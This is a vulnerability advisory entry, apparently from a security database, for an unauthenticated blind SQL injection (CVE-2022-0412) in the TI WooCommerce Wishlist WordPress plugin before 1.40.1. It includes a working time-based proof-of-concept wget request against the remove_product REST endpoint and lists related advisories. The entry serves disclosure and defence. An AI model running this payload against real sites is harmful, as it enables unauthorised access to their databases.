Lucene search
Krzysztof ZającWPEX-ID:E984BA11-ABEB-4ED4-9DAD-0BFD539A9682HistoryJan 31, 2022 - 12:00 a.m.
TI WooCommerce Wishlist < 1.40.1 - Unauthenticated Blind SQL Injection
2022-01-3100:00:00
Krzysztof Zając
257
ti woocommerce wishlist
unauthenticated
blind sql injection
sql injection
security exploit
EPSS
0.021
Percentile
89.3%
The plugins do not sanitise and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint, allowing unauthenticated attackers to perform SQL injection attacks
time wget 'https://example.com/?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(2)%20--%20g'
Even though it will produce an error 400, the payload is processed and response delayedRelated
cve
cve
CVE-2022-0412
2022-02-28 09:15:09
nuclei
nuclei
WordPress TI WooCommerce Wishlist <1.40.1 - SQL Injection
2022-10-01 13:34:58
cnvd
cnvd
WordPress TI WooCommerce Wishlist plugin SQL injection vulnerability
2022-03-02 00:00:00
nvd
nvd
CVE-2022-0412
2022-02-28 09:15:09
githubexploit
githubexploit
Exploit for SQL Injection in Templateinvaders Ti Woocommerce Wishlist
2024-03-20 22:22:51
wpvulndb
wpvulndb
TI WooCommerce Wishlist < 1.40.1 - Unauthenticated Blind SQL Injection
2022-01-31 00:00:00
cvelist
cvelist
patchstack
patchstack
openvas
openvas
WordPress TI WooCommerce Wishlist Plugin < 1.40.1 SQLi Vulnerability
2022-03-14 00:00:00
prion
prion
Sql injection
2022-02-28 09:15:00